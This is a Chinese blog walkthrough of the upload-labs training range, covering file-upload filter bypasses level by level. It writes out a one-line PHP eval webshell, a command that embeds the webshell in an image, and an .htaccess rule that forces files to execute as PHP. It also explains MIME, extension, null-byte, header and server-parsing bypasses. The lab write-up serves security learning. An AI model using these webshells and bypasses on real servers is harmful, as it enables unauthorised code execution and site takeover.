upload-labs简易解答___文件上传漏洞

最新推荐文章于 2024-04-28 23:02:18 发布
最新推荐文章于 2024-04-28 23:02:18 发布
阅读量1.6k 收藏
点赞数
分类专栏: 笔记 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qz362228/article/details/124282251
版权

文章目录

pass-01和pass-02

两个都是后端MIME检测,所以只需修改MIME类型即可
在这里插入图片描述
这里上传一个webshell
注意:x=phpinfo(); ------> ()不要漏了!!!
在这里插入图片描述

pass-03___黑名单–修改文件后缀名

前提:Apache的httpd.conf中有如下配置,注意#要去掉
在这里插入图片描述

修改.php后缀名为.phtml
在这里插入图片描述
在这里插入图片描述

pass-04___.htaccess绕过

①先制作一个图片马,1.php中为一句话木马

<? php @eval($_POST[x]); ?>

准备好一句话木马和一个.png文件2,然后在该文件目录下,在命令行输入 copy 2.png/b+1.php/a 3.png
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
②配置
.apache配置文件为AllowOverride All(默认为None)
在这里插入图片描述
Apache开启rewrite模块
在这里插入图片描述
下面表示存在.htaccess文件的目录下,所有文件都会被解析成php代码执行
在这里插入图片描述

<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>

③success
在这里插入图片描述

pass-05___黑名单–大小写绕过

查看源文件,发现它虽然列举了很多,但没有把拓展名转为小写,所以直接把.php改为.pHP
在这里插入图片描述
在这里插入图片描述
鼠标右键直接得图像地址
在这里插入图片描述
在这里插入图片描述

pass-06__利用Windows系统的命名机制

在这里插入图片描述
在这里插入图片描述

pass-07__IIS6.0解析漏洞—文件解析

xx.asp;.jpg 像这种畸形文件名在;后面的直接被忽略,也就是说当成xx.asp文件执行。
在这里插入图片描述
在这里插入图片描述

pass-08__IIS7.0 | IIS7.5 | Nginx的解析漏洞

在这里插入图片描述

**原理:**Nginx拿到文件路径(更专业的说法是URI)/test.jpg/test.php后,一看后缀是.php,便认为该文件是php文件,转交给php去处理。php一看/test.jpg/test.php不存在,便删去最后的/test.php,又看/test.jpg存在,便把/test.jpg当成要执行的文件了,又因为后缀为.jpg,php认为这不是php文件,于是返回Access denied。
  这其中涉及到php的一个选项:cgi.fix_pathinfo,该值默认为1,表示开启。开启这一选项PHP可以对文件路径进行修理。
  举个例子,当php遇到文件路径/1.jpg/2.txt/3.php时,若/1.jpg/2.txt/3.php不存在,则会去掉最后的/3.php,然后判断/1.jpg/2.txt是否存在,若存在,则把/1.jpg/2.txt当做文件/1.jpg/2.txt/3.php,若/1.jpg/2.txt仍不存在,则继续去掉/2.txt,以此类推。

在这里插入图片描述

pass-08__Apache解析漏洞

在这里插入图片描述

原理: Apache解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.a.b的“.a”和“.b”这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。

在这里插入图片描述

pass-10__双写绕过

str_ireplace()函数表示将后缀名置为空,但只进行一次
在这里插入图片描述
将后缀名改为.pphphp
在这里插入图片描述
做这题时要注意apache配置问题,如果之前改过要记得改回来,还有php版本也要注意不要太低。我就是没有改导致直接上传.php文件也成功了,这是因为做pass-04___.htaccess绕过的时候改了配置,却忘了改回原样,所以不带扩展名也可以访问。

pass-11__00截断

PHP版本要小于5.3.4,php的magic_quotes_gpc为OFF状态
在这里插入图片描述
在这里插入图片描述

pass-12__IIS6.0解析漏洞----目录解析

将目录名修改为upload.php,所有文件都会被解析成php代码执行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

pass-13/pass-14/pass-15同一个类型___源文件检测了文件头

pass-13

在这里插入图片描述
上传文件名为3.png的图片马,但查看源码发现有检测文件头,因为只读两个字节,所以加上GIF89即可,GIF89A也相同
在这里插入图片描述
在这里插入图片描述

pass-14

在这里插入图片描述
这里获取的是文件信息,不像上面只获取两个字节,所以加上GIF89A
在这里插入图片描述
在这里插入图片描述

pass-15

exif_imagetype() 读取一个图像的第一个字节并检查其签名。
在这里插入图片描述
去掉分号
在这里插入图片描述
和前面两个一样,这个只检查第一个字节,所以GIF8,GIF89,GIF89A均可
在这里插入图片描述

pass-16__二次渲染漏洞

制作图片马3.gif,注意!创建2.gif的时候不能是空文件
在这里插入图片描述
右键将图片保存到桌面
在这里插入图片描述
将其放在010Editor观察发现没有<?php phpinfo(); ?>,加上后保存
在这里插入图片描述
在这里插入图片描述

pass-17

上传图片马,在010中发现有<?php phpinfo(); ?>
在这里插入图片描述
但有一堆乱码,不知道是不是正常现象
在这里插入图片描述

pass-18

上传图片马
在这里插入图片描述

pass-19

查看源码,是改过之后的文件名,所以直接上传shell.php即可
在这里插入图片描述
在这里插入图片描述

pass-20

修改文件类型即可
在这里插入图片描述

总结

以下是我做题所查看的资料还有遇到一些问题时的解决方法的网站
点击查看各个漏洞原理
apache启动失败
apache不带扩展名访问

乔治777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload-labs 1~17题
giun的博客
03-25 3098
一、pass01 1、首先我们尝试下上传一个php文件,发现文件类型被限制了 我们查看下源码 发现是使用js代码对文件类型进行限制。 那么我们使用火狐浏览器的插件Noscript,打开这个插件即可禁用掉js代码,然后成功上传PHP,文件。 2、当然这个太麻烦了,我们可以直接删除这个坚持文件格式的函数即可。 3、我们上传个正常的图片,图片的路径:http://127.0.0.1/upload-...
Upload-labs文件上传漏洞(空格绕过)——Pass06
Zichel77的博客
07-27 1006
0×00 题目描述 似乎可以使用Pass04文件改写?但是感觉应该不会那么简单 0×01 源码分析 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".
【网络安全文件上传漏洞详解】(1)
最新发布
2301_82242964的博客
04-28 1103
修改路径值,添加%00,然后提交。与白名单相反,通过限制某些文件格式,使其无法上传之服务端。只存在于APACHE中主要功能:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
文件上传漏洞-uploadlabs靶场1~10关解析
黄乔国PHP
03-16 844
在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,比如社交网站中,允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多,web应用受到攻击的风险就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获取网站的权限,或者进一步危害服务器。
文件上传漏洞练习—upload-labs通关记录(踩坑!!!)
Wuxia_Bai的博客
12-24 895
一步步做下来的真实记录,希望能帮助大家,避免踩坑!!!一个简单的记录,部分关卡需要进行相应配置,均已说明。
新版phpstudy文件上传漏洞靶场:21关的upload-labs安装,及404错误解决
03-07 3750
使用新版phpstudy搭建上传漏洞
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞的靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
WEB渗透学习-upload-labs靶场
04-20
"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础到高级,帮助新手逐步提升对这类漏洞的理解和应对能力。 ### 一、文件上传漏洞概述 文件上传漏洞通常发生在Web应用程序中...
安装upload-labs
10-22
1. 学习文件上传漏洞课程:upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验,您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据关卡提示信息练习:upload-labs提供了多个关卡...
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
Upload-labs
qq_62517352的博客
03-18 514
Pass-01 安装好Upload-labs之后在浏览器中输入http://127.0.0.1/upload-labs/打开靶场 开始上传shell.php 文件发现被禁止了,这个时候我们把浏览器的JavaScript设置为禁止,因为这个是通过前端的js验证,这样我们就可以上传我们的一句话木马文件了 一句话木马文件,密码是888 上传文件后我们把返回的图片文件地址复制一下 打开蚁剑,输入刚得到的地址,密码就是888,测试一下也是连接成功,我们直接可以添加了 添加成功之后我们拿到权限了 ...
文件上传漏洞实例(upload-labs11-19)
whoim_i的博客
02-26 4275
目录前言pass-11(get00截断)pass-12(post 00截断)pass-13(图片马unpack)pass-14(getimagesize图片马)pass-15(exif_imagetype图片马)pass-16(二次渲染绕过)pass-17(条件竞争)pass-18(条件竞争)pass-19(./绕过)       &n...
Upload-labs文件上传漏洞(上传路径可控)——Pass11
Zichel77的博客
07-28 1111
0×00 题目概述 0×01 源代码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$
upload-labs上传漏洞记录
Lollipop_zhi的博客
03-07 3256
upload-labs通关记录,不定期更新,欢迎关注~感谢点赞~
Upload-labs文件上传漏洞(图片渲染)——Pass16
Zichel77的博客
08-04 681
0×00 题目概述 不太明白什么叫渲染 0×01 源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name']; $filetype = $_FILES['upload_file']['type']; $tmpname = $_FILE.
文件上传漏洞——upload-labs 1-19 (详解)
m0_62879498的博客
02-19 6828
upload-labs-1 删除 js 进行绕过 上传图片,发现上传成功 上传 shell 发现: 发现是白名单,所以由前面我们知道,极有可能在前端存在过滤,我们检查一下: 发现 checkFile() 起到了检查过滤的效果,我们将其删去并提交 发现: 然后用中国以蚁剑 进行链接 发现成功 发现成功 同时我们发现仅仅在前端进行过滤是远远不够的,我们可以轻易的删去,所以除了前端,后端也必须进行校验 如果我们在使用蚁剑发现了返回值为空说明一句话木马语法错误,如果我们发现返回值是一串乱码 则是链接地址
文件上传漏洞——upload-labs文件包链接及通关详解过程、代码注释
小羊的博客
09-07 987
Pass-01 前端验证绕过 页面另存为本地文件,更改前端限制 关闭浏览器js代码禁用 使用代理拦截上传 方法1:页面另存为本地文件,用记事本打开,找到文件上传类型,添加所要上传的文件类型,保存并打开修改过的页面,再上传就成功啦。 方法2:浏览器中关闭JavaScript代码解析则可。 方法3:使用Burp Suit代理,拦截,将所有JS限制删除,再上传phpinfo.php文件。(三种方法原理一样) Pass-02 MIME-...
文件上传漏洞靶场upload-labs练习
weixin_44866139的博客
05-28 1458
下载地址:https://github.com/c0ny1/upload-labs php版本:推荐5.2.17(其他版本可能会导致部分Pass无法突破) php组件(扩展):php_gd2,php_exif(部分Pass需要开启这两个组件) apache:以moudel方式连接 Pass-01 由提示可知这是前端文件后缀检查 思路: 1、写一个一句话木马文件 2、修改文件后缀名为jpg 3、上传木马文件,抓包 4、将文件后缀名修改为php,重放这个抓到的包 5、用菜刀连上一句话木马文件,获得webshe
upload-labs靶场通关指南
07-02
Upload-labs靶场提供了一系列关卡,模拟了不同的文件上传防护机制,让测试者练习如何绕过这些防护。下面我们将详细分析每个关卡所涉及的知识点。 Pass-1: 这一关主要涉及JavaScript文件格式验证。当尝试上传非指定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值